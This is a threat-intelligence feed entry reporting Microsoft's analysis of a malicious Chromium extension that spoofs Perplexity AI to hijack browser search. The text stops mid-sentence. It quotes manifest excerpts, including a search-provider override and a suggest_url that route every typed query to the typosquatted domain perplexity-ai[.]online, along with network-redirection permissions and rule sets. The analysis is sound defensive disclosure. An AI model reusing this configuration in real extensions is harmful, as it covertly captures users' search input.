Back to Feed
MalwareJun 29, 2026

Chromium extension uses AI‑related branding to redirect browser search

Malicious Chromium extension spoofs Perplexity AI to hijack browser search traffic.

Summary

A malicious Chromium-based browser extension, masquerading as the AI search engine Perplexity AI, has been identified. It uses Manifest V3 APIs and intermediary infrastructure to redirect user search queries and collect data. Microsoft reported the extension to Google, leading to its removal.

Full text

Share Link copied to clipboard! Content typesResearchProducts and servicesMicrosoft DefenderTopicsActionable threat insightsAI and agents Microsoft Threat Intelligence has identified a malicious Chromium-based extension that spoofs the AI-powered answer engine Perplexity AI to trick unsuspecting users into installing it. Based on our observation of the extension’s behavior, we assess its primary objective to be search traffic interception and data collection, which might enable downstream use cases such as profiling, targeted advertising, or other forms of misuse depending on operator intent. Through responsible disclosure, we reported this extension to Google, and it has been taken down as of this writing. We’d like to thank Google for responding to and addressing this issue. Browser extensions continue to represent a significant attack surface within enterprise and consumer ecosystems due to their privileged access to browser APIs, user traffic, and browsing behavior. However, unlike traditional search hijackers that rely primarily on aggressive monetization or visible redirection, this extension combines Manifest Version 3 (MV3) capabilities with intermediary infrastructure and declarativeNetRequest (DNR) rules to transparently intercept Omnibox queries while preserving the appearance of legitimate search results. In addition, while browser search hijacking is not a new threat category, this research highlights how threat actors continue to operationalize AI to accelerate attacks—specifically the use of AI brands as a social engineering vector. The extension routes both full search queries and real-time search suggestions (typed characters) through attacker-controlled infrastructure hosted on a domain not associated with the legitimate vendor, before redirecting users to expected search providers. While the observed activity demonstrates the capability to capture user input and browsing signals, no evidence in our analysis definitively confirms additional objectives such as credential theft. However, the level of access and permissions requested introduces elevated privacy and security risk. As threat actors continue to capitalize on emerging industry trends such as AI and leverage trusted branding to improve the success rates of their campaigns, organizations should strengthen user awareness training and similar programs to educate end users about the latest social engineering tactics. They should also implement a layered security strategy that correlates available indicators with behavioral signals and other threat intelligence. In this blog post, we provide our analysis of the browser extension—including key indicators of malicious behavior and findings from our dynamic analysis. We also provide mitigation and protection guidance, as well as advanced hunting queries, to help organizations detect and defend against this threat. Extension overview The extension we analyzed has the following attributes: AttributeValueExtension nameSearch for perplexity aiExtension IDflkebkiofojicogddingbdmcmkpbplcdManifest versionMV3Version2.2Observed purposeBrowser search override and redirect logicReferenced brandPerplexity AISuspicious domainperplexity-ai[.]online It appears to spoof the publicly available Perplexity service by using similar branding elements and a typosquatted domain. The said domain mismatch might increase the likelihood of user confusion regarding the extension’s source or affiliation. Figure 1: Landing page of perplexity-ai[.]online. Figure 2: Details of the extension on Chrome Store. Based on our analysis, the extension has been classified as malicious due to observed search redirection behavior. The analyzed extension’s manifest declares itself as the following: "search_provider": { "name": "Perplexity Search" } It uses the following infrastructure: "search_url": https://perplexity-ai[.]online/search/{searchTerms} The extension also forces itself as the browser default search provider: "is_default": true At first glance, the extension appears to provide AI-enhanced search functionality. However, analysis of the manifest reveals multiple suspicious behaviors and permissions inconsistent with legitimate AI search assistants. Figure 3. Manifest.json configuration of the analyzed extension. Figure 4. Manifest.json configuration of the analyzed extension (continued). Key indicators of malicious behavior Typosquatted infrastructure The extension uses the domain perplexity-ai[.]online, which is similar to the legitimate Perplexity AI service’s domain (perplexity[.]ai). This pattern is consistent with domain naming approaches often frequently observed in phishing campaigns, search hijackers, fake AI applications, and extension malware. Previous research has discussed how browser extensions might use branding similar to trusted services because: Users associate AI tools with productivity and legitimacy AI-related extensions currently experience high install rates Users are less suspicious of browser-integrated AI assistants Browser search hijacking The extension overrides browser search settings through chrome_settings_overrides to replace the browser default search provider as well as intercept and redirect all queries in a Chromium browser’s Omnibox to an intermediary infrastructure not associated with the official vendor domain: "chrome_settings_overrides": { "search_provider": { "name": "Perplexity Search", "keyword": "perplexity", "is_default": true, "search_url": "hxxps://perplexity-ai[.]online/search/{searchTerms}", "favicon_url": "hxxps://perplexity-ai[.]online/favicon.ico", "suggest_url": "hxxps://perplexity-ai[.]online/search?output=firefox&q={searchTerms}" } } Critically, the suggest_url field also routes through perplexity-ai[.]online. This means real-time search suggestions—every character typed in the address bar—are transmitted to an attacker-controlled infrastructure before any redirect occurs. This constitutes active user surveillance (keystroke-level capture) beyond simple search redirection. Although Chromium-based browsers permit search provider overrides for legitimate use cases, Google explicitly states that extensions requesting settings overrides along with additional powerful capabilities might violate the browser’s single-purpose policy. Abuse of declarativeNetRequest The extension requests powerful DNR permissions that enable traffic redirection, URL rewriting, and selective request filtering, which aren’t consistent with expected AI assistant behavior: "permissions": [ "declarativeNetRequest", "declarativeNetRequestFeedback", "declarativeNetRequestWithHostAccess" ] These permissions provide specific capabilities exploited by this extension: declarativeNetRequest: Redirects all main_frame requests matching perplexity-ai[.]online/search/(.*) to legitimate search engines, creating a two-hop chain where the attacker server processes the query before the browser is redirected. declarativeNetRequestFeedback: Allows the extension to programmatically monitor which redirect rules fire, effectively confirming exfiltration success for each intercepted query. declarativeNetRequestWithHostAccess: Combined with host_permissions for ://perplexity-ai.online/, enables full request interception capabilities on the attacker-controlled domain. This behavior might enable traffic redirection and related activity depending on implementation. The use of these permissions in an AI-themed search extension is particularly concerning because a legitimate search UI generally doesn’t require advanced network-manipulation APIs. Search rewrite infrastructure Multiple rule sets indicate modular traffic hijacking capability across providers such as Perplexity, Google, and Bing: "rule_resources": [ { "id": "perplexity", "enabled": true, "path": "perplexity-rules.json" }, { "id": "bing", "enabled": false, "path": "bing-rules.json" }, { "id": "google", "enabled": false, "path": "google-rules.json" } ] This architecture enables modular traffic redirection

Indicators of Compromise

  • domain — perplexity-ai[.]online
  • url — https://perplexity-ai[.]online/search/{searchTerms}

Entities

Chromium (product)Perplexity AI (product)Microsoft (vendor)Google (vendor)Manifest V3 (technology)